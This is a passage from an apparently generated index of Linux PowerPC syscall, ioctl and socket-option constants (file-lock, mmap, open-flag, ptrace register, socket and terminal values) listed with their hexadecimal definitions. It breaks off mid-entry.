FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0x5 constant F_GETLK64 (line 96) | F_GETLK64 = 0xc constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0xd constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0xe constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x4000 constant ICANON (line 110) | ICANON = 0x100 constant IEXTEN (line 111) | IEXTEN = 0x400 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x80 constant IUCLC (line 116) | IUCLC = 0x1000 constant IXOFF (line 117) | IXOFF = 0x400 constant IXON (line 118) | IXON = 0x200 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x80 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x40 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x2000 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x4000 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x8000 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NL2 (line 149) | NL2 = 0x200 constant NL3 (line 150) | NL3 = 0x300 constant NLDLY (line 151) | NLDLY = 0x300 constant NOFLSH (line 152) | NOFLSH = 0x80000000 constant NS_GET_NSTYPE (line 153) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 154) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 155) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 156) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 157) | OLCUC = 0x4 constant ONLCR (line 158) | ONLCR = 0x2 constant OTPERASE (line 159) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 160) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 161) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 162) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 163) | OTPSELECT = 0x40044d0d constant O_APPEND (line 164) | O_APPEND = 0x400 constant O_ASYNC (line 165) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 166) | O_CLOEXEC = 0x80000 constant O_CREAT (line 167) | O_CREAT = 0x40 constant O_DIRECT (line 168) | O_DIRECT = 0x20000 constant O_DIRECTORY (line 169) | O_DIRECTORY = 0x4000 constant O_DSYNC (line 170) | O_DSYNC = 0x1000 constant O_EXCL (line 171) | O_EXCL = 0x80 constant O_FSYNC (line 172) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 173) | O_LARGEFILE = 0x0 constant O_NDELAY (line 174) | O_NDELAY = 0x800 constant O_NOATIME (line 175) | O_NOATIME = 0x40000 constant O_NOCTTY (line 176) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 177) | O_NOFOLLOW = 0x8000 constant O_NONBLOCK (line 178) | O_NONBLOCK = 0x800 constant O_PATH (line 179) | O_PATH = 0x200000 constant O_RSYNC (line 180) | O_RSYNC = 0x101000 constant O_SYNC (line 181) | O_SYNC = 0x101000 constant O_TMPFILE (line 182) | O_TMPFILE = 0x404000 constant O_TRUNC (line 183) | O_TRUNC = 0x200 constant PARENB (line 184) | PARENB = 0x1000 constant PARODD (line 185) | PARODD = 0x2000 constant PENDIN (line 186) | PENDIN = 0x20000000 constant PERF_EVENT_IOC_DISABLE (line 187) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 188) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 189) | PERF_EVENT_IOC_ID = 0x40082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 190) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 191) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 192) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 193) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 194) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 195) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 196) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 197) | PERF_EVENT_IOC_SET_FILTER = 0x80082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 198) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 199) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 200) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 201) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 202) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 203) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 204) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 205) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 206) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 207) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 208) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 209) | PPPIOCGIDLE = 0x4010743f constant PPPIOCGIDLE32 (line 210) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 211) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 212) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 213) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 214) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 215) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 216) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 217) | PPPIOCSACTIVE = 0x80107446 constant PPPIOCSASYNCMAP (line 218) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 219) | PPPIOCSCOMPRESS = 0x8010744d constant PPPIOCSDEBUG (line 220) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 221) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 222) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 223) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 224) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 225) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 226) | PPPIOCSPASS = 0x80107447 constant PPPIOCSRASYNCMAP (line 227) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 228) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 229) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 230) | PPPIOCXFERUNIT = 0x2000744e constant PROT_SAO (line 231) | PROT_SAO = 0x10 constant PR_SET_PTRACER_ANY (line 232) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETEVRREGS (line 233) | PTRACE_GETEVRREGS = 0x14 constant PTRACE_GETFPREGS (line 234) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETREGS64 (line 235) | PTRACE_GETREGS64 = 0x16 constant PTRACE_GETVRREGS (line 236) | PTRACE_GETVRREGS = 0x12 constant PTRACE_GETVSRREGS (line 237) | PTRACE_GETVSRREGS = 0x1b constant PTRACE_GET_DEBUGREG (line 238) | PTRACE_GET_DEBUGREG = 0x19 constant PTRACE_SETEVRREGS (line 239) | PTRACE_SETEVRREGS = 0x15 constant PTRACE_SETFPREGS (line 240) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETREGS64 (line 241) | PTRACE_SETREGS64 = 0x17 constant PTRACE_SETVRREGS (line 242) | PTRACE_SETVRREGS = 0x13 constant PTRACE_SETVSRREGS (line 243) | PTRACE_SETVSRREGS = 0x1c constant PTRACE_SET_DEBUGREG (line 244) | PTRACE_SET_DEBUGREG = 0x1a constant PTRACE_SINGLEBLOCK (line 245) | PTRACE_SINGLEBLOCK = 0x100 constant PTRACE_SYSEMU (line 246) | PTRACE_SYSEMU = 0x1d constant PTRACE_SYSEMU_SINGLESTEP (line 247) | PTRACE_SYSEMU_SINGLESTEP = 0x1e constant PT_CCR (line 248) | PT_CCR = 0x26 constant PT_CTR (line 249) | PT_CTR = 0x23 constant PT_DAR (line 250) | PT_DAR = 0x29 constant PT_DSCR (line 251) | PT_DSCR = 0x2c constant PT_DSISR (line 252) | PT_DSISR = 0x2a constant PT_FPR0 (line 253) | PT_FPR0 = 0x30 constant PT_FPSCR (line 254) | PT_FPSCR = 0x50 constant PT_LNK (line 255) | PT_LNK = 0x24 constant PT_MSR (line 256) | PT_MSR = 0x21 constant PT_NIP (line 257) | PT_NIP = 0x20 constant PT_ORIG_R3 (line 258) | PT_ORIG_R3 = 0x22 constant PT_R0 (line 259) | PT_R0 = 0x0 constant PT_R1 (line 260) | PT_R1 = 0x1 constant PT_R10 (line 261) | PT_R10 = 0xa constant PT_R11 (line 262) | PT_R11 = 0xb constant PT_R12 (line 263) | PT_R12 = 0xc constant PT_R13 (line 264) | PT_R13 = 0xd constant PT_R14 (line 265) | PT_R14 = 0xe constant PT_R15 (line 266) | PT_R15 = 0xf constant PT_R16 (line 267) | PT_R16 = 0x10 constant PT_R17 (line 268) | PT_R17 = 0x11 constant PT_R18 (line 269) | PT_R18 = 0x12 constant PT_R19 (line 270) | PT_R19 = 0x13 constant PT_R2 (line 271) | PT_R2 = 0x2 constant PT_R20 (line 272) | PT_R20 = 0x14 constant PT_R21 (line 273) | PT_R21 = 0x15 constant PT_R22 (line 274) | PT_R22 = 0x16 constant PT_R23 (line 275) | PT_R23 = 0x17 constant PT_R24 (line 276) | PT_R24 = 0x18 constant PT_R25 (line 277) | PT_R25 = 0x19 constant PT_R26 (line 278) | PT_R26 = 0x1a constant PT_R27 (line 279) | PT_R27 = 0x1b constant PT_R28 (line 280) | PT_R28 = 0x1c constant PT_R29 (line 281) | PT_R29 = 0x1d constant PT_R3 (line 282) | PT_R3 = 0x3 constant PT_R30 (line 283) | PT_R30 = 0x1e constant PT_R31 (line 284) | PT_R31 = 0x1f constant PT_R4 (line 285) | PT_R4 = 0x4 constant PT_R5 (line 286) | PT_R5 = 0x5 constant PT_R6 (line 287) | PT_R6 = 0x6 constant PT_R7 (line 288) | PT_R7 = 0x7 constant PT_R8 (line 289) | PT_R8 = 0x8 constant PT_R9 (line 290) | PT_R9 = 0x9 constant PT_REGS_COUNT (line 291) | PT_REGS_COUNT = 0x2c constant PT_RESULT (line 292) | PT_RESULT = 0x2b constant PT_SOFTE (line 293) | PT_SOFTE = 0x27 constant PT_TRAP (line 294) | PT_TRAP = 0x28 constant PT_VR0 (line 295) | PT_VR0 = 0x52 constant PT_VRSAVE (line 296) | PT_VRSAVE = 0x94 constant PT_VSCR (line 297) | PT_VSCR = 0x93 constant PT_VSR0 (line 298) | PT_VSR0 = 0x96 constant PT_VSR31 (line 299) | PT_VSR31 = 0xd4 constant PT_XER (line 300) | PT_XER = 0x25 constant RLIMIT_AS (line 301) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 302) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 303) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 304) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 305) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 306) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 307) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 308) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 309) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 310) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 311) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 312) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 313) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 314) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 315) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 316) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 317) | RTC_EPOCH_READ = 0x4008700d constant RTC_EPOCH_SET (line 318) | RTC_EPOCH_SET = 0x8008700e constant RTC_IRQP_READ (line 319) | RTC_IRQP_READ = 0x4008700b constant RTC_IRQP_SET (line 320) | RTC_IRQP_SET = 0x8008700c constant RTC_PARAM_GET (line 321) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 322) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 323) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 324) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 325) | RTC_PLL_GET = 0x40207011 constant RTC_PLL_SET (line 326) | RTC_PLL_SET = 0x80207012 constant RTC_RD_TIME (line 327) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 328) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 329) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 330) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 331) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 332) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 333) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 334) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 335) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 336) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 337) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 338) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 339) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 340) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 341) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 342) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 343) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 344) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 345) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 346) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 347) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 348) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 349) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 350) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 351) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 352) | SIOCINQ = 0x4004667f constant SIOCOUTQ (line 353) | SIOCOUTQ = 0x40047473 constant SIOCSPGRP (line 354) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 355) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 356) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 357) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 358) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 359) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 360) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 361) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 362) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 363) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 364) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 365) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 366) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 367) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 368) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 369) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 370) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 371) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 372) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 373) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 374) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 375) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 376) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 377) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 378) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 379) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 380) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 381) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 382) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 383) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 384) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 385) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 386) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 387) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 388) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 389) | SO_PASSCRED = 0x14 constant SO_PASSPIDFD (line 390) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 391) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 392) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 393) | SO_PEERCRED = 0x15 constant SO_PEERGROUPS (line 394) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 395) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 396) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 397) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 398) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 399) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 400) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 401) | SO_RCVLOWAT = 0x10 constant SO_RCVMARK (line 402) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 403) | SO_RCVTIMEO = 0x12 constant SO_RCVTIMEO_NEW (line 404) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 405) | SO_RCVTIMEO_OLD = 0x12 constant SO_RESERVE_MEM (line 406) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 407) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 408) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 409) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 410) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 411) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 412) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 413) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 414) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 415) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 416) | SO_SNDLOWAT = 0x11 constant SO_SNDTIMEO (line 417) | SO_SNDTIMEO = 0x13 constant SO_SNDTIMEO_NEW (line 418) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 419) | SO_SNDTIMEO_OLD = 0x13 constant SO_TIMESTAMPING (line 420) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 421) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 422) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 423) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 424) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 425) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 426) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 427) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 428) | SO_TXTIME = 0x3d constant SO_TYPE (line 429) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 430) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 431) | SO_ZEROCOPY = 0x3c constant TAB1 (line 432) | TAB1 = 0x400 constant TAB2 (line 433) | TAB2 = 0x800 constant TAB3 (line 434) | TAB3 = 0xc00 constant TABDLY (line 435) | TABDLY = 0xc00 constant TCFLSH (line 436) | TCFLSH = 0x2000741f constant TCGETA (line 437) | TCGETA = 0x40147417 constant TCGETS (line 438) | TCGETS = 0x402c7413 constant TCSAFLUSH (line 439) | TCSAFLUSH = 0x2 constant TCSBRK (line 440) | TCSBRK = 0x2000741d constant TCSBRKP (line 441) | TCSBRKP = 0x5425 constant TCSETA (line 442) | TCSETA = 0x80147418 constant TCSETAF (line 443) | TCSETAF = 0x8014741c constant TCSETAW (line 444) | TCSETAW = 0x80147419 constant TCSETS (line 445) | TCSETS = 0x802c7414 constant TCSETSF (line 446) | TCSETSF = 0x802c7416 constant TCSETSW (line 447) | TCSETSW = 0x802c7415 constant TCXONC (line 448) | TCXONC = 0x2000741e constant TFD_CLOEXEC (line 449) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 450) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 451) | TIOCCBRK = 0x5428 constant TIOCCONS (line 452) | TIOCCONS = 0x541d constant TIOCEXCL (line 453) | TIOCEXCL = 0x540c constant TIOCGDEV (line 454) | TIOCGDEV = 0x40045432 constant TIOCGETC (line 455) | TIOCGETC = 0x40067412 constant TIOCGETD (line 456) | TIOCGETD = 0x5424 constant TIOCGETP (line 457) | TIOCGETP = 0x40067408 constant TIOCGEXCL (line 458) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 459) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 460) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 461) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGLTC (line 462) | TIOCGLTC = 0x40067474 constant TIOCGPGRP (line 463) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 464) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 465) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 466) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 467) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 468) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 469) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 470) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 471) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 472) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 473) | TIOCINQ = 0x4004667f constant TIOCLINUX (line 474) | TIOCLINUX = 0x541c constant TIOCMBIC (line 475) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 476) | TIOCMBIS = 0x5416 constant TIOCMGET (line 477) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 478) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 479) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 480) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 481) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 482) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 483) | TIOCM_DSR = 0x100 constant TIOCM_LOOP (line 484) | TIOCM_LOOP = 0x8000 constant TIOCM_OUT1 (line 485) | TIOCM_OUT1 = 0x2000 constant TIOCM_OUT2 (line 486) | TIOCM_OUT2 = 0x4000 constant TIOCM_RI (line 487) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 488) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 489) | TIOCM_SR = 0x10 constant TIOCM_ST (line 490) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 491) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 492) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 493) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 494) | TIOCPKT = 0x5420 constant TIOCSBRK (line 495) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 496) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 497) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 498) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 499) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 500) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 501) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 502) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 503) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 504) | TIOCSER_TEMT = 0x1 constant TIOCSETC (line 505) | TIOCSETC = 0x80067411 constant TIOCSETD (line 506) | TIOCSETD = 0x5423 constant TIOCSETN (line 507) | TIOCSETN = 0x8006740a constant TIOCSETP (line 508) | TIOCSETP = 0x80067409 constant TIOCSIG (line 509) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 510) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 511) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSLTC (line 512) | TIOCSLTC = 0x80067475 constant TIOCSPGRP (line 513) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 514) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 515) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 516) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 517) | TIOCSSOFTCAR = 0x541a constant TIOCSTART (line 518) | TIOCSTART = 0x2000746e constant TIOCSTI (line 519) | TIOCSTI = 